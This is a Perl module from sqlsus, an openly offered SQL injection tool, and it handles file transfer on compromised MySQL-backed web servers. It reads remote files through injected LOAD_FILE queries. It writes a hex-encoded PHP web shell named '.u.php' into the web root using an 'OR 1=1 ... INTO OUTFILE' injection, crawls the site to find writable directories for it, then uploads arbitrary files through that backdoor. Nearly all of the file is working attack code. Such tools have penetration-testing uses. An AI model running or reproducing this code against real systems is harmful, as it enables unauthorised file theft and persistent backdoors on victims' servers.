package file;

# This file is part of sqlsus
#
# Copyright (c) 2008,2009 sativouf
# http://sqlsus.sf.net/
#
# Licensed under the GPL version 2.0 license.
# See LICENSE file or
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.html

use strict;
use warnings;

use File::Path;
use WWW::Mechanize;

##################################
sub download {
	my $file = shift;

	# remove quotes if any
	if ($file =~ /^(['"])(.*)\1$/) {
		$file = $2;
	}

	if (not $file) {
        print STDERR "Usage : download [remote file]\n";
        print STDERR "Note that you need the FILE privilege\n";
        return 0;
    }

	my $target_file = $conf::datapath . "/" . $main::server . "/" . $conf::filespath . "/" . $file;
	$target_file =~ s#/+#/#g;

	# relative path
	# simple and stupid way to avoid local file overwrite
	$target_file =~ s#\.\.#dotdot#g;

	if (-f $target_file) {
		if (&functions::question("$target_file already exists, download and overwrite", qw(y n)) eq "n") {
			return 1;
		}
	}

	my $target_path = $target_file;
	$target_path =~ s#/[^/]*$##;

	my ($status, @result) = &select::query("SELECT LOAD_FILE(\"$file\")", 1);
	if ($status and $result[0] ne "\x06") {
		print STDERR join "", @result;
		eval { mkpath $target_path };
		if (open TARGET, "> $target_file") {
			print TARGET join "", @result;
			close TARGET;
			print STDERR "\n[+] file content successfully saved to $target_file\n";
		} else {
			print STDERR "[+] ERROR : cannot open $target_file for writing : $!\n";
		}
	} else {
		print STDERR "[+] Empty record, file not saved\n";
	}
}

##############################
sub upload {
	my ($in, $out) = @_;

	if (not $in or not $out) {
		print STDERR "Usage : upload [local file] [remote path]\n";
        print STDERR "Note that you need the FILE privilege and the ability to inject quotes\n";
		return 0;
	}
	if (not -r $in) {
		print STDERR "ERROR: local file \"$in\" not readable\n";
		return 0;
	}

	if (not $conf::uploader) {
		print "[+] \$conf::uploader not set... trying to upload uploader\n";
		if (&upload_uploader) {
			print STDERR "[+] uploader uploaded : $conf::uploader\n";
		} else {
			print STDERR "[+] no writable directory found to upload the backdoor to. (is document_root correctly set ?)\n";
			return 0;
		}
	}
	open F, "<$in" or warn "can't open local file \"$in\" for reading : $!";
	my @data = <F>;
	close F;
	my %form = (
		t => "$out",
		d => join "", @data
	);

	my $debug = $conf::debug;
	$conf::debug = 0;
	my $res = &functions::get_url($conf::uploader, \%form);
	$conf::debug = $debug;
	if ($res->is_success and $res->content !~ /failed to open stream/) {
		print "[+] local file \"$in\" uploaded as \"$out\" on the remote server\n";
		if ($out !~ /^[\/]/) {
			my $dir = $conf::uploader;
			$dir =~ s#/[^/]*$##;
			print "[+] => file accessible at : $dir/$out\n";
		}
		return 1;
	}
	if ($res->content =~ m#<b>(.*)</b>:\s*(.*)<b>#) {
		print "$1: $2\n";
	} 
	print "[+] failed to upload local file \"$in\" as \"$out\" on the remote server..\n";
	return 0;
}

##############################
sub try_to_upload_uploader {
	my $directory = shift;

	my $file = $conf::document_root . "$directory/.u.php";
	$file =~ s#/+#/#g;
	my $uploader = &functions::string_to_hex('<?fwrite(fopen($_POST[t],w),$_POST[d]);');

	# try to upload uploader
	# into outfile needs quotes..
	my $url = $conf::url_start . "OR 1=1 LIMIT 1 INTO OUTFILE \"$file\" LINES TERMINATED BY $uploader" . $conf::url_end;
	my $res = &functions::get_url($url);

	# check if uploader was successfully uploaded, then try to post backdoor
	$directory =~ s/^\///;
	$directory =~ s/\/$//;
	$url = $main::url_base . $directory . "/.u.php";
	$res = &functions::get_url($url);

	if ($res->is_success) {
		$conf::uploader = "$url";
		return 1;
	}
	return 0;
}

##################################
sub upload_uploader {
	if (@conf::upload_directories) {
		for my $dir (@conf::upload_directories) {
			if (&try_to_upload_uploader($dir)) {
				return 1;
			}
		}
	} else {
		my @urls;
		push @urls, $conf::url_start, $conf::url_start, $main::url_base;
		# without script
		$urls[0] =~ s#/[^/]+$##;

		print STDERR "[+] Crawling the website for candidate directories at max depth $conf::crawler_depth\n";

		my $depth = 0;

		my $mech = WWW::Mechanize->new();
		if ($conf::proxy)       { $mech->proxy("http", $conf::proxy); }
		if ($conf::cred_realm)  { $mech->credentials("$main::server:$main::port", $conf::cred_realm, $conf::cred_user, $conf::cred_password) }

		$mech->cookie_jar(HTTP::Cookies->new);
		# Set cookie
		for (split /\s*;\s*/, $conf::cookie) {
			my ($key, $value) = /(.*?)=(.*)/;
			$mech->cookie_jar->set_cookie(0, $key, $value, "/", ".$main::server",,,,,);
		}

		my @fetched_urls = ();
		my @directories = qw(/);

		while ($depth != $conf::crawler_depth) {
			$depth++;
			for my $url (@urls, @directories) {
				return 0 if $main::interrupt; 
				$url =~ s#/+$##;

				my $slash_url = $url;
				$slash_url =~ s#^$main::url_base#/#;

				next if grep {$_ eq $slash_url} @fetched_urls;
				next if $url =~ /\.(gif|jpg|jpeg|png|bmp|css)$/i;


				push @fetched_urls, $slash_url;

				if ($conf::debug) { print STDERR "[$depth] Fetching $url : " }
				$mech->get( "$url" );
				sleep($conf::sleep_after_hit);
				if ($conf::debug) { print STDERR $mech->response()->code . " (" . $mech->response()->message . ")\n" }
				if (not $mech->response()->is_success) {
					next;
				}

				# parse all links / add them to the download queue if not seen yet
				for my $link ($mech->find_all_links()) {
					my $url = $link->url_abs()->abs;
					# only consider local links
					next unless ($url =~ /^$main::url_base/);

					my $url_without_args = $url;
					$url_without_args =~ s/\?.*//;

					# if the url has not been fecthed yet, and is not in the "to fetch" list
					push(@urls, "$url") unless grep(/^$url_without_args/, @urls);

					# extract absolute directory
					$url =~ s#^$main::url_base#/#;
					$url =~ s#/[^/]*$#/#;
					# and stack "new" directories
					while ($url =~ m#/.+$#) {
						if (not grep($_ eq $url, @directories)) {
							if (&try_to_upload_uploader($url)) {
								return 1;
							} else {
								push(@directories, $url);
							}
						}
						$url =~ s#/[^/]+(/?)$#$1#;
					}

				}


				# parse all images to get more directories 
				#TODO parse src='' SRC="" etc.. to get directories from javascript, movies..
				for my $image ($mech->find_all_images) {
					my $url = $image->url_abs();
	#               print "[IMG] $url\n";
					# only consider local links
					next unless ($url =~ /^$main::url_base/);
					# remove everything after last /
					$url =~ s/\/[^\/]+$/\//;
					# remove $main::url_base
					$url =~ s#^$main::url_base#/#;
					$url =~ s#/[^/]*$#/#;
					# and stack "new" directories
					while ($url =~ m#/.+$#) {
						if (not grep($_ eq $url, @directories)) {
							if (&try_to_upload_uploader($url)) {
								return 1;
							} else {
								push(@directories, $url);
							}
						}
						$url =~ s#/[^/]+(/?)$#$1#;
					}
				}
			}
		}
	}
}

	1
